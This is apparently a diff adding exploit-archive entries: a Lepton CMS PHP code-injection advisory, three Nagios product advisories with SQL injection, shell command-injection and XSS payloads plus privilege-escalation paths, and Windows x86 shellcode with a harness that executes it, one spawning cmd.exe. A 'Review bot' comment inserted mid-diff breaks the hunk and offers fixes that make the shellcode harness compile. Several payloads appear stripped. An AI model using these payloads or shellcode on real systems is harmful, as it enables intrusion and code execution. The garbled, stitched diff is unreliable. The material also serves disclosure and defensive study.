+?>
+
+
+Disclosure Timeline:
+===========================================================
+Attempted Vendor Notification: June 11, 2016 (No replies)
+Vendor Notification on July 12, 2016 ( thanks Henri Salo )
+Vendor Acknowledgement: July 13, 2016
+Vendor fixes: July 14, 2016
+Vendor release version 2.2.2 : August 12, 2016
+August 15, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+================
+High
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
diff --git a/platforms/php/webapps/40248.txt b/platforms/php/webapps/40248.txt
new file mode 100755
index 000000000..879541cec
--- /dev/null
+++ b/platforms/php/webapps/40248.txt
@@ -0,0 +1,141 @@
+[+] Credits: John Page (HYP3RLINX)
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.lepton-cms.org
+
+
+
+Product:
+=================================
+Lepton CMS 2.2.0 / 2.2.1 (update)
+
+LEPTON is an easy-to-use but full customizable Content Management System
+(CMS).
+
+
+
+
+Vulnerability Type:
+===================
+PHP Code Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+No input validation check is done on the "Database User" input field when
+entering Lepton CMS setup information using the Install Wizard.
+Therefore, a malicious user can input whatever they want in "config.php",
+this can allow for PHP Remote Command Execution on the Host system.
+
+e.g.
+
+In the database username field, single quote to close "DB_USERNAME" value
+then open our own PHP tags.
+
+');?>
+
+Now in "config.php" the Database username becomes ===>
+define('DB_USERNAME', '');?>');
+
+A security check attempt is made by Lepton to disallow making multiple HTTP
+requests for "config.php". On line 3 of "config.php" file we find.
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////
+
+if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted
+to load \'config.php\' twice!!
+Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+However, the security check is placed on line 3 way before "LEPTON_PATH"
+has been defined allowing complete bypass of that access control check.
+Now we can inject our own PHP code into the config allowing Remote Command
+Execution or Local/Remote File Includes etc...
+
+Next, make HTTP GET request to "http://victim-server/upload/install/save.php"
+again and code execution will be achieved or request "config.php"
+directly as the security check made on line 3 of "config.php" to prevent
+multiple HTTP requests to "config.php" does NOT work anyhow.
+
+In situations where an installation script is provided as part of a some
+default image often available as a convenience by hosting providers, this
+can
+be used to gain code execution on the target system and bypass whatever
+security access controls/restrictions etc.
+
+References:
+http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
+
+
+Exploit code(s):
+===============
+
+1) At step 4 of Leptons Install Wizard, enter ');?> for Database User name, then fill in rest of fields
+
+2) Click go to step 5 and fill in required fields, then click "Install
+LEPTON"
+
+3) Make HTTP GET request to:
+
+ http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
+
+ OR
+
+ http://localhost/LEPTON_stable_2.2.0/upload/config.php
+
+
+BOOM pop calc.exe...
+
+
+
+Disclosure Timeline:
+===========================================================
+Attempted Vendor Notification: June 11, 2016 (No replies)
+Vendor Notification on July 12, 2016 ( thanks Henri Salo )
+Vendor Acknowledgement: July 13, 2016
+Vendor fixes: July 14, 2016
+Vendor release version 2.2.2 : August 12, 2016
+August 15, 2016 : Public Disclosure
+
+
+
+
+Severity Level:
+================
+High
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
diff --git a/platforms/php/webapps/40250.txt b/platforms/php/webapps/40250.txt
new file mode 100755
index 000000000..b91d7e51a
--- /dev/null
+++ b/platforms/php/webapps/40250.txt
@@ -0,0 +1,170 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Log Server Multiple Vulnerabilities +Affected versions: Nagios Log Server <= 1.4.1 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Log Server application is affected by multiple security +vulnerabilities, including authentication bypass, stored cross-site +scripting, inconsistent authorization controls and privilege escalation. + +These vulnerabilities can be chained together to obtain unauthenticated +remote code execution in the context of the root user. + + ++------------+ +|Exploitation| ++------------+ +==Authentication Bypass== +Authentication for the Nagios Log Server web management interface can be +bypassed due to an insecure implementation of the function validating +session cookies within the ‘Session.php’ file. As shown below, the +application uses a base64 encoded serialized PHP string along with a +SHA1 HMAC checksum as the cookie to authenticate and manage user +sessions. A sample cookie format is shown below: + +a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123"; +s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) +Gecko/20100101 Firefox/46.0"; +s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user"; +s:5:"email";s:16:"test@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";} + +The application relies on the validation against the SHA1 HMAC to +recognize and destroy invalid session cookies when the checksum value +does not match. 
However the encryption key used to generate the HMAC +checksum is statically set to the SHA1 hash value of the +$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value. +This information can be controlled by the attacker and as such should +not be considered a secure randomly generated value for the secret +encryption key. + +Since no further verification is performed for other non-predictable +fields (e.g. session_id, apikey, email, username etc.) and only a valid +user agent string matching the correct HTTP header value is required, an +attacker can forge arbitrary session cookies and bypass authentication. + +The script on the following page generates session cookies which are +accepted and validated successfully by the application. A ‘user_id’ +value of 1 can be used to initiate a session in the context of the admin +user. + +[POC - nagiosls_forge_cookie.php] + + + +This vulnerability is present across multiple Nagios products. + + +==Stored Cross-Site Scripting== +The Nagios Log Server application does not validate and HTML encode log +data sent by configured sources. This issue is aggravated by the fact +that the application does not maintain a list of authorized log sources, +but instead accept data from any host connecting to the Nagios Log +Server port responsible of collecting logs (TCP 5544). An attacker can +exploit this vulnerability to send malicious JavaScript code and execute +it in the context of Nagios Log Server user session as shown below. + +[POC STORED XSS] +# echo '' | nc [TARGET IP] 5544 + +The payload gets rendered under '/nagioslogserver/dashboard'. + +==Inconsistent Authorization Controls== +The Nagios Log Server application provides intended functionality to +define custom alert commands using different configuration options. By +default, only administrative users can define alert commands which +execute scripts on the Log Server filesystem when an alert is triggered. 
+ +However, the application does not properly enforce authorization checks +and an attacker can access the same functionality in the context of a +standard user session by providing the correct payload in the ‘alert’ +POST parameter. This functionality can be abused to obtain remote code +execution on the target system as the application does not restrict the +script definition to a single folder and an attacker can specify +absolute paths to any script or executable file present on the Log +Server host. + +[POC - CREATE COMMAND EXECUTION ALERT] +URL => /nagioslogserver/api/check/create/1 +Method => POST +Payload => +alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1", +"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch", +"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"} + + +==Privilege Escalation== +The default Log Server application sudoers configuration allows the +‘apache’ user to run the ‘get_logstash_ports.sh’ script as root without +being prompted for a password. However insecure file write permissions +have been granted to the 'nagios' group for the ‘get_logstash_ports.sh’ +script file. Since the apache user is a member of the 'nagios' group, an +attacker can overwrite the script contents with arbitrary data. + +Details about the script with insecure permissions are provided below: +PATH => /usr/local/nagioslogserver/scripts/get_logstash_ports.sh +PERMISSIONS => rwxrwxr-x nagios nagios + + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios Log Server 1.4.2 + + ++------------+ +| Timeline | ++------------+ +2/06/2016 – Initial disclosure to vendor +3/06/2016 – Vendor acknowledges receipt of advisory +22/07/2016 – Vendor releases patched software version +11/08/2016 – Public disclosure + + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. 
+http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf \ No newline at end of file diff --git a/platforms/php/webapps/40251.txt b/platforms/php/webapps/40251.txt new file mode 100755 index 000000000..062293b3e --- /dev/null +++ b/platforms/php/webapps/40251.txt 
@@ -0,0 +1,191 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Network Analyzer Multiple Vulnerabilities +Affected versions: Nagios Network Analyzer <= 2.2.0 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Network Analyzer application is affected by multiple security +vulnerabilities, including authentication bypass, SQL injection, +arbitrary code execution via command injection and privilege escalation. + +These vulnerabilities can be chained together to obtain unauthenticated +remote code execution in the context of the root user. + ++------------+ +|Exploitation| ++------------+ +==Authentication Bypass== +Authentication for the Nagios Network Analyzer web management interface +can be bypassed due to an insecure implementation of the function +validating session cookies within the ‘Session.php’ file. As shown +below, the application uses a base64 encoded serialized PHP string along +with a SHA1 HMAC checksum as the cookie to authenticate and manage user +sessions. 
A sample cookie format is shown below: + + a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx"; + s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) +Gecko/20100101 Firefox/46.0";s:13:"last_activity"; + i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email"; + s:30:"xxxxxx@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess"; + s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession"; + b:1;s:7:"view_id";i:0;} + +The application relies on the validation against the SHA1 HMAC to +recognize and destroy invalid session cookies when the checksum value +does not match. However the encryption key used to generate the HMAC +checksum is statically set to the SHA1 hash value of the +$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value. +This information can be controlled by the attacker and as such should +not be considered a secure randomly generated value for the secret +encryption key. + +Since no further verification is performed for other non-predictable +fields (e.g. session_id, apikey, email, username etc.) and only a valid +user agent string matching the correct HTTP header value is required, an +attacker can forge arbitrary session cookies and bypass authentication. + +The script on the following page generates session cookies which are +accepted and validated successfully by the application. A ‘user_id’ +value of 1 can be used to initiate a session in the context of the admin +user. + +[POC - nagiosna_forge_cookie.php] + + +This vulnerability is present across multiple Nagios products. + + +==SQL Injection== +Multiple SQL injection vulnerabilities exist in the application web +management interface. An attacker can exploit this vulnerabilities to +retrieve sensitive data from the application MySQL database. 
+ +URL => +/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=&o%5Bsort%5D=ASC +Method => GET +Parameter => o[col] +POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW) + +URL => +/nagiosna/index.php/api/sources/read?o%5Bcol%5D=&o%5Bsort%5D=ASC +Method => GET +Parameter => o[col] +POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW) + +URL => /nagiosna/index.php/admin/globals +Method => POST +Parameter => timezone +POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT +COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS +CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT +0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS +GROUP BY x)a) AND '%'='' + + +==Command Injection== +A command injection vulnerability exists in the function generating PDF +reports for download. Base64 encoded user-supplied input is passed as an +argument to system shell calls without being escaped. An attacker can +inject arbitrary shell commands and obtain remote code execution in the +context of the apache user. + +URL => /nagiosna/index.php/download/report/sourcegroup// +Method => GET +POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo " + +URL => /nagiosna/index.php/download/report/source// +Method => GET +POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo " + +Arbitrary code execution in the context of the ‘nna’ user can also be +obtained by abusing the intended functionality to define custom alert +commands. As shown in the next section, this exposes the application to +additional privilege escalation attack vectors. + + +==Privilege Escalation== +The default application sudoers configuration allows the ‘apache’ and +‘nna’ users to run multiple Bash and Python scripts as root without +being prompted for a password. The 'apache' user is in the 'nnacmd' +group, which has insecure write permissions to multiple script files. 
An +attacker can overwrite their contents with a malicious payload (i.e. +spawn a shell) and escalate privileges to root. + +The script files with insecure permissions are listed below: + +PATH => /usr/local/nagiosna/bin/rc.py +PERMISSIONS => rwxrwxr-t nna nnacmd + +PATH => /usr/local/nagiosna/scripts/change_timezone.sh +PERMISSIONS => rwsrwsr-t nna nnacmd + +PATH => /usr/local/nagiosna/scripts/upgrade_to_latest.sh +PERMISSIONS => rwsrwsr-t nna nnacmd + + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios Network Analyzer 2.2.2. + + ++------------+ +| Timeline | ++------------+ +2/06/2016 – Initial disclosure to vendor +3/06/2016 – Vendor acknowledges receipt of advisory +3/06/2016 – Vendor releases new software build (2.2.1) +8/07/2016 – Inform vendor about insecure fix (generation of encryption +key based on epoch) +9/07/2016 – Vendor confirms issue and replies with new fix +01/08/2016 – Vendor releases patched software version +11/08/2016 – Public disclosure + + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. +http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf \ No newline at end of file diff --git a/platforms/php/webapps/40252.txt b/platforms/php/webapps/40252.txt new file mode 100755 index 000000000..eddfab579 --- /dev/null +++ b/platforms/php/webapps/40252.txt 
@@ -0,0 +1,124 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Incident Manager Multiple Vulnerabilities +Affected versions: Nagios Incident Manager <= 2.0.0 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Incident Manager application is vulnerable to multiple +vulnerabilities, including remote code execution via command injection, +SQL injection and stored cross-site scripting. + + ++------------+ +|Exploitation| ++------------+ +==Command Injection== +Multiple command injection vulnerabilities exist within the incident +report file generation functionality as user input is passed to system +shell calls without validation. A limited non-administrative user, who +by default does not have permissions to add custom MIME types for +incident file attachments, can exploit these vulnerabilities to obtain +remote code execution on the Incident Manager system as the ‘apache’ user. 
+ +URL => /nagiosim/reports/download//mttr/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + +URL => /nagiosim/reports/download//closed/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + +URL => /nagiosim/reports/download//first_response/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + +URL => /nagiosim/reports/download//general/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + + +==SQL Injection== +The Nagios IM admin functionality to update the application settings is +vulnerable to an SQL Injection vulnerability via error-based payloads. +An attacker can inject into the ‘timezone’ POST parameter and retrieve +sensitive information from the application MySQL database. + +URL => /nagiosim/admin/settings +Method => POST +Parameter => timezone +Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT +COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS +CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ' + + +==Stored Cross-Site Scripting== +Multiple stored cross-scripting vulnerabilities exist in the Nagios IM +web interface, allowing a standard user to insert malicious JavaScript +payloads into administrative and non-administrative application +functionality. This attack vector could be used by an authenticated +attacker with standard user privileges to hijack the session of an admin +user and extend their permissions within the application (e.g. adding +PHP as a valid MIME type for file attachments). 
+ +URL => /nagiosim/incidents/add +Method => POST +Parameters => title, summary, priority, file_description, status +Render => /nagiosim/incidents, /nagiosim/incidents/details/ +POC Payload => + +URL => /nagiosim/api/incidents//messages +Method => POST +Parameters => title +Render => /nagiosim/incidents/details/ +POC Payload => + +URL => /nagiosim/profile +Method => POST +Parameters => username, first_name, last_name +Render => /nagiosim/admin/users, Global Menu Banner (username) +POC Payload => + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios Incident Manager 2.0.1 + + ++------------+ +| Timeline | ++------------+ +2/06/2016 - Initial disclosure to vendor +3/06/2016 - Vendor acknowledges receipt of advisory +8/07/2016 - Vendor releases patched software version (2.0.1) +11/08/2016 – Public disclosure + + + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. +http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40245.c b/platforms/win_x86/shellcode/40245.c new file mode 100755 index 000000000..d265601b9 --- /dev/null +++ b/platforms/win_x86/shellcode/40245.c 
@@ -0,0 +1,273 @@
+/*
+ # Title : Windows x86 MessageBoxA shellcode
+ # Author : Roziul Hasan Khan Shifat
+ # Date : 14-08-2016
+ # Tested On : Windows 7 starter x86
+*/
+
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+ 0: 31 c9 xor %ecx,%ecx
+ 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
+ 6: 8b 40 0c mov 0xc(%eax),%eax
+ 9: 8b 70 14 mov 0x14(%eax),%esi
+ c: ad lods %ds:(%esi),%eax
+ d: 96 xchg %eax,%esi
+ e: ad lods %ds:(%esi),%eax
+ f: 8b 48 10 mov 0x10(%eax),%ecx
+ 12: 31 db xor %ebx,%ebx
+ 14: 8b 59 3c mov 0x3c(%ecx),%ebx
+ 17: 01 cb add %ecx,%ebx
+ 19: 8b 5b 78 mov 0x78(%ebx),%ebx
+ 1c: 01 cb add %ecx,%ebx
+ 1e: 8b 73 20 mov 0x20(%ebx),%esi
+ 21: 01 ce add %ecx,%esi
+ 23: 31 d2 xor %edx,%edx
+
+00000025 :
+ 25: 42 inc %edx
+ 26: ad lods %ds:(%esi),%eax
+ 27: 01 c8 add %ecx,%eax
+ 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
+ 2f: 75 f4 jne 25
+ 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
+ 38: 75 eb jne 25
+ 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
+ 41: 75 e2 jne 25
+ 43: 8b 73 1c mov 0x1c(%ebx),%esi
+ 46: 01 ce add %ecx,%esi
+ 48: 8b 14 96 mov (%esi,%edx,4),%edx
+ 4b: 01 ca add %ecx,%edx
+ 4d: 89 d6 mov %edx,%esi
+ 4f: 89 cf mov %ecx,%edi
+ 51: 31 db xor %ebx,%ebx
+ 53: 53 push %ebx
+ 54: 68 61 72 79 41 push $0x41797261
+ 59: 68 4c 69 62 72 push $0x7262694c
+ 5e: 68 4c 6f 61 64 push $0x64616f4c
+ 63: 54 push %esp
+ 64: 51 push %ecx
+ 65: ff d2 call *%edx
+ 67: 83 c4 10 add $0x10,%esp
+ 6a: 31 c9 xor %ecx,%ecx
+ 6c: 68 6c 6c 42 42 push $0x42426c6c
+ 71: 88 4c 24 02 mov %cl,0x2(%esp)
+ 75: 68 33 32 2e 64 push $0x642e3233
+ 7a: 68 75 73 65 72 push $0x72657375
+ 7f: 54 push %esp
+ 80: ff d0 call *%eax
+ 82: 83 c4 0c add $0xc,%esp
+ 85: 31 c9 xor %ecx,%ecx
+ 87: 68 6f 78 41 42 push $0x4241786f
+ 8c: 88 4c 24 03 mov %cl,0x3(%esp)
+ 90: 68 61 67 65 42 push $0x42656761
+ 95: 68 4d 65 73 73 push $0x7373654d
+ 9a: 54 push %esp
+ 9b: 50 push %eax
+ 9c: ff d6 call *%esi
+ 9e: 83 c4 0c add $0xc,%esp
+ a1: 31 d2 xor %edx,%edx
+ a3: 31 c9 xor %ecx,%ecx
+ a5: 52 push %edx
+ a6: 68 73 67 21 21 push $0x21216773
+ ab: 68 6c 65 20 6d push $0x6d20656c
+ b0: 68 53 61 6d 70 push $0x706d6153
+ b5: 8d 14 24 lea (%esp),%edx
+ b8: 51 push %ecx
+ b9: 68 68 65 72 65 push $0x65726568
+ be: 68 68 69 20 54 push $0x54206968
+ c3: 8d 0c 24 lea (%esp),%ecx
+ c6: 31 db xor %ebx,%ebx
+ c8: 43 inc %ebx
+ c9: 53 push %ebx
+ ca: 52 push %edx
+ cb: 51 push %ecx
+ cc: 31 db xor %ebx,%ebx
+ ce: 53 push %ebx
+ cf: ff d0 call *%eax
+ d1: 31 c9 xor %ecx,%ecx
+ d3: 68 65 73 73 41 push $0x41737365
+ d8: 88 4c 24 03 mov %cl,0x3(%esp)
+ dc: 68 50 72 6f 63 push $0x636f7250
+ e1: 68 45 78 69 74 push $0x74697845
+ e6: 8d 0c 24 lea (%esp),%ecx
+ e9: 51 push %ecx
+ ea: 57 push %edi
+ eb: ff d6 call *%esi
+ ed: 31 c9 xor %ecx,%ecx
+ ef: 51 push %ecx
+ f0: ff d0 call *%eax
+*/
+
+
+/*
+section .text
+ global _start
+_start:
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB->Ldr
+mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov ecx,[eax+0x10] ;kernel32 base address
+
+
+xor ebx,ebx
+mov ebx,[ecx+0x3c] ;DOS->elf_anew
+add ebx,ecx
+mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
+add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
+
+mov esi,[ebx+0x20] ;AddressOfNames
+add esi,ecx
+
+;--------------------------------------------------
+
+
+xor edx,edx
+g:
+inc edx
+lodsd
+add eax,ecx
+cmp dword [eax],'GetP'
+jnz g
+cmp dword [eax+4],'rocA'
+jnz g
+cmp dword [eax+8],'ddre'
+jnz g
+
+
+;-----------------------------------------------------
+
+mov esi,[ebx+0x1c] ;AddressOfFunctions
+add esi,ecx
+;---------------------------------
+
+
+mov edx,[esi+edx*4]
+add edx,ecx ;GetProcAddress()
+
+;------------------
+mov esi,edx
+mov edi,ecx
+;--------------------
+
+;finding address of LoadLibraryA()
+xor ebx,ebx
+push ebx
+push 0x41797261
+push 0x7262694c
+push 0x64616f4c
+
+
+push esp
+push ecx
+
+call edx
+
+add esp,16
+;---------------------------
+xor ecx,ecx
+
+;LoadLibraryA("user32.dll")
+push 0x42426c6c
+mov [esp+2],byte cl
+push 0x642e3233
+push 0x72657375
+
+
+push esp
+call eax
+
+;-------------------------
+
+;Finding address of MessageBoxA()
+add esp,12
+xor ecx,ecx
+push 0x4241786f
+mov [esp+3],byte cl
+push 0x42656761
+push 0x7373654d
+
+push esp
+push eax
+
+call esi
+
+;---------------------------------
+add esp,12
+
+;----------------
+;MessageBoxA(NULL,"Sample msg!!","hi There",1)
+
+xor edx,edx
+xor ecx,ecx
+
+
+push edx
+push 0x21216773
+push 0x6d20656c
+push 0x706d6153
+
+lea edx,[esp] ; "Sample msg!!"
+
+push ecx
+push 0x65726568
+push 0x54206968
+
+lea ecx,[esp] ; "hi There"
+
+xor ebx,ebx
+
+inc ebx
+
+
+push ebx
+push edx
+push ecx
+xor ebx,ebx
+push ebx
+
+call eax
+
+
+;----------------------
+xor ecx,ecx
+push 0x41737365
+mov [esp+3],byte cl
+push 0x636f7250
+push 0x74697845
+
+
+lea ecx,[esp]
+
+
+push ecx
+push edi
+
+call esi
+
+;---------------
+xor ecx,ecx
+push ecx
+call eax
+*/
+
+
+#include
+#include
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
+
+main()
+{
+printf("shellcode lenght %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}
diff --git a/platforms/win_x86/shellcode/40246.c b/platforms/win_x86/shellcode/40246.c
new file mode 100755
index 000000000..ddfe6c341
--- /dev/null
+++ b/platforms/win_x86/shellcode/40246.c
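Review bot: The harness at the bottom of the hunk declares `main()` with an implicit `int` return type and no `return` statement, a form C99 removed and C23 rejects; 40246.c carries the identical harness and the same remarks apply there. Both `#include` directives are empty as they arrive here, so `printf` and `strlen` have no declarations — presumably `<stdio.h>` and `<string.h>` were lost with their angle brackets and should be restored as `#include <stdio.h>` and `#include <string.h>`. The output string also misspells "length"; `printf("shellcode length %ld\n",(long)strlen(shellcode));` together with `int main(void)` and a closing `return 0;` makes the harness valid C11. The `(int(*)())` cast converts an object pointer into a function pointer, which ISO C leaves undefined, so a one-line comment stating that the harness relies on platform-specific behaviour would help readers. In the assembly listing the comment `;DOS->elf_anew` misnames the IMAGE_DOS_HEADER field; it should read `;DOS->e_lfanew`.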
@@ -0,0 +1,328 @@
+/*
+ # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
+ # Author : Roziul Hasan Khan Shifat
+ # Date : 15-08-2016
+ # Tested On : Windows 7 x86
+*/
+
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+ 0: 31 c9 xor %ecx,%ecx
+ 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
+ 6: 8b 40 0c mov 0xc(%eax),%eax
+ 9: 8b 70 14 mov 0x14(%eax),%esi
+ c: ad lods %ds:(%esi),%eax
+ d: 96 xchg %eax,%esi
+ e: ad lods %ds:(%esi),%eax
+ f: 8b 48 10 mov 0x10(%eax),%ecx
+ 12: 31 db xor %ebx,%ebx
+ 14: 8b 59 3c mov 0x3c(%ecx),%ebx
+ 17: 01 cb add %ecx,%ebx
+ 19: 8b 5b 78 mov 0x78(%ebx),%ebx
+ 1c: 01 cb add %ecx,%ebx
+ 1e: 8b 73 20 mov 0x20(%ebx),%esi
+ 21: 01 ce add %ecx,%esi
+ 23: 31 d2 xor %edx,%edx
+
+00000025 :
+ 25: 42 inc %edx
+ 26: ad lods %ds:(%esi),%eax
+ 27: 01 c8 add %ecx,%eax
+ 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
+ 2f: 75 f4 jne 25
+ 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
